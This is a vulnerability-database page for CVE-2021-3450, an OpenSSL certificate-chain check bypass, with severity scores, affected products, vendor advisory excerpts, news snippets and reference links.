5.8
CVSSv2

CVE-2021-3450

Published: 25/03/2021 Updated: 20/10/2021
CVSS v2 Base Score: 5.8 | Impact Score: 4.9 | Exploitability Score: 8.6
CVSS v3 Base Score: 7.4 | Impact Score: 5.2 | Exploitability Score: 2.2
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:N

Vulnerability Summary

On March 25, 2021, the OpenSSL Project released a security advisory, OpenSSL Security Advisory [25 March 2021], that disclosed two vulnerabilities. Exploitation of these vulnerabilities could allow an malicious user to use a valid non-certificate authority (CA) certificate to act as a CA and sign a certificate for an arbitrary organization, user or device, or to cause a denial of service (DoS) condition. This advisory will be updated as additional information becomes available. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd

Most Upvoted Vulmon Research Post

There is no Researcher post for this vulnerability
Would you like to share something about it? Sign up now to share your knowledge with the community.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

openssl openssl

freebsd freebsd 12.2

netapp santricity_smi-s_provider_firmware -

netapp storagegrid_firmware -

windriver linux -

windriver linux 17.0

windriver linux 18.0

windriver linux 19.0

netapp cloud volumes ontap mediator -

netapp oncommand workflow automation -

netapp ontap select deploy administration utility -

netapp storagegrid -

fedoraproject fedora 34

tenable nessus

tenable nessus agent

tenable nessus network monitor 5.11.0

tenable nessus network monitor 5.11.1

tenable nessus network monitor 5.12.0

tenable nessus network monitor 5.12.1

tenable nessus network monitor 5.13.0

oracle graalvm 19.3.5

oracle graalvm 20.3.1.2

oracle graalvm 21.0.0.2

oracle mysql server

oracle mysql workbench

oracle secure global desktop 5.6

mcafee web gateway 8.2.19

mcafee web gateway 9.2.10

mcafee web gateway 10.1.1

mcafee web gateway cloud service 8.2.19

mcafee web gateway cloud service 9.2.10

mcafee web gateway cloud service 10.1.1

Vendor Advisories

Security vulnerabilities have been disclosed on 25h March 2021 by the OpenSSL Project OpenSSl is used by IBM Sterling Connect:Express for UNIX IBM Sterling Connect:Express for UNIX has addressed the applicable CVE ...
A flaw was found in openssl The flag that enables additional security checks of certificates present in a certificate chain was not enabled allowing a confirmation step to verify that certificates in the chain are valid CA certificates is bypassed The highest threat from this vulnerability is to data confidentiality and integrity ...
Arch Linux Security Advisory ASA-202103-10 ========================================== Severity: High Date : 2021-03-25 CVE-ID : CVE-2021-3449 CVE-2021-3450 Package : openssl Type : multiple issues Remote : Yes Link : securityarchlinuxorg/AVG-1736 Summary ======= The package openssl before version 111k-1 is vulnerable to m ...
The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain It is not set by default Starting from OpenSSL version 111h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check An error in the impleme ...
Nessus leverages third-party software to help provide underlying functionality One of the third-party components (OpenSSL) was found to contain vulnerabilities, and updated versions have been made available by the providers Out of caution and in line with good practice, Tenable opted to upgrade the bundled OpenSSL components to address the poten ...
On March 25, 2021, the OpenSSL Project released a security advisory, OpenSSL Security Advisory [25 March 2021], that disclosed two vulnerabilities Exploitation of these vulnerabilities could allow an attacker to use a valid non-certificate authority (CA) certificate to act as a CA and sign a certificate for an arbitrary organization, user or devic ...
Multiple vulnerabilities have been found in Hitachi Ops Center Common Services CVE-2021-3449, CVE-2021-3450, CVE-2021-23840, CVE-2021-23841 Affected products and versions are listed below Please upgrade your version to the appropriate version ...
Nessus Network Monitor leverages third-party software to help provide underlying functionality One of the third-party components (OpenSSL) was found to contain vulnerabilities, and updated versions have been made available by the providers Out of caution and in line with good practice, Tenable opted to upgrade the bundled OpenSSL components to a ...
Multiple vulnerabilities have been found in Hitachi Ops Center Analyzer viewpoint CVE-2020-1971, CVE-2021-3393, CVE-2021-3449, CVE-2021-3450, CVE-2021-23840, CVE-2021-23841 Affected products and versions are listed below Please upgrade your version to the appropriate version ...
Multiple vulnerabiilities in XStream, Java, OpenSSL, WebSphere Application Server Liberty and Nodejs may affect IBM Spectrum Control The Java vulnerabilities were disclosed as part of the IBM Java SDK updates in October 2020 and January 2021 ...

Mailing Lists

Hi, As many of you are aware, the OpenSSL project provides pre-notification of vulnerability disclosures The way they do it is by posting to the public OpenSSL mailing lists (see "Forthcoming OpenSSL release" below) and by contacting specific other projects/channels with an offer to provide the actual detail more privately only to those interest ...

Github Repositories

![[jellyfish_headerpng]] Year of the Jellyfish (YotJF) Bradley, rnbochsr | 4/23/2021 - 4/30/2021 Target configuration info Website IP changes each time the machine spins up URL: robyns-petshopthm Website Platform: AmazonAWS Version #? Web server: Apache 2429 Ubuntu Site runs using PicoCMS Version #? OpenSSH 59p1 and 76p1 OpenSSL 111k vsFTPd 303 Initi

Catlin Vulnerability Scanner This can be used to scan vulnerability in Tekton Tasks What is Trivy? Trivy (tri pronounced like trigger, vy pronounced like envy) is a simple and comprehensive vulnerability scanner for containers and other artifacts A software vulnerability is a glitch, flaw, or weakness present in the software or in an Operating System Trivy detects vulnerabi

TASSL-111k 新版本特性 1、基于开源openssl111k修改。相较于之前基于openssl111b版本的tassl,修复了以下漏洞: CVE-2019-1543 CVE-2019-1552 CVE-2019-1563 CVE-2019-1547 CVE-2019-1549 CVE-2020-1967 CVE-2020-1971 CVE-2021-23840 CVE-2021-23839 CVE-2021-23841 CVE-2021-3449 CVE-2021-3450 CVE-2021-3711 2、支持RFC 8998 ShangMi (SM) Cipher Suites for TLS

Recent Articles

OpenSSL shuts down two high-severity bugs: Flaws enable cert shenanigans, denial-of-service attacks
The Register • Thomas Claburn in San Francisco • 25 Mar 2021

Debian, Ubuntu ahead of the curve in patching at least – don't be late yourself How do you fix a problem like open-source security? Google has an idea, though constraints may not go down well

Two high-severity vulnerabilities in the OpenSSL software library were disclosed on Thursday alongside the release of a patched version of the software, OpenSSL 1.1.1k.
OpenSSL is widely used to implement the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols, which support encrypted network connections. Alternatives include BoringSSL and LibreSSL, among others.
The first flaw, a certificate check bypass (CVE-2021-3450), arose as a result of code implemented in v...

The Register

Two high-severity vulnerabilities in the OpenSSL software library were disclosed on Thursday alongside the release of a patched version of the software, OpenSSL 1.1.1k.
OpenSSL is widely used to implement the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols, which support encrypted network connections. Alternatives include BoringSSL and LibreSSL, among others.
The first flaw, a certificate check bypass (CVE-2021-3450), arose as a result of code implemented in v...

OpenSSL fixes severe DoS, certificate validation vulnerabilities
BleepingComputer • Ax Sharma • 01 Jan 1970

Today, the OpenSSL project has issued an advisory for two high-severity vulnerabilities CVE-2021-3449 and CVE-2021-3450 lurking in OpenSSL products.
OpenSSL is a commonly used software library for building networking applications and servers that need to establish secure communications.
These flaws include:
The DoS vulnerability (CVE-2021-3449) in OpenSSL TLS server can cause the server to crash if during the course of renegotiation the client sends a malicious 
 m...

References

CWE-295https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63bhttps://www.openssl.org/news/secadv/20210325.txthttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJdhttps://security.netapp.com/advisory/ntap-20210326-0006/https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.aschttp://www.openwall.com/lists/oss-security/2021/03/27/1http://www.openwall.com/lists/oss-security/2021/03/27/2http://www.openwall.com/lists/oss-security/2021/03/28/3http://www.openwall.com/lists/oss-security/2021/03/28/4https://security.gentoo.org/glsa/202103-03https://www.tenable.com/security/tns-2021-05https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/https://www.tenable.com/security/tns-2021-08https://kc.mcafee.com/corporate/index?page=content&id=SB10356https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.htmlhttps://www.tenable.com/security/tns-2021-09https://www.oracle.com/security-alerts/cpuApr2021.htmlhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013https://www.oracle.com//security-alerts/cpujul2021.htmlhttps://www.oracle.com/security-alerts/cpuoct2021.htmlhttps://nvd.nist.govhttps://www.ibm.com/blogs/psirt/security-bulletin-openssl-vulnerabilities-affect-ibm-sterling-connectexpress-for-unix-cve-2021-3449-cve-2021-3450/https://www.openssl.org/news/secadv/20210325.txthttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd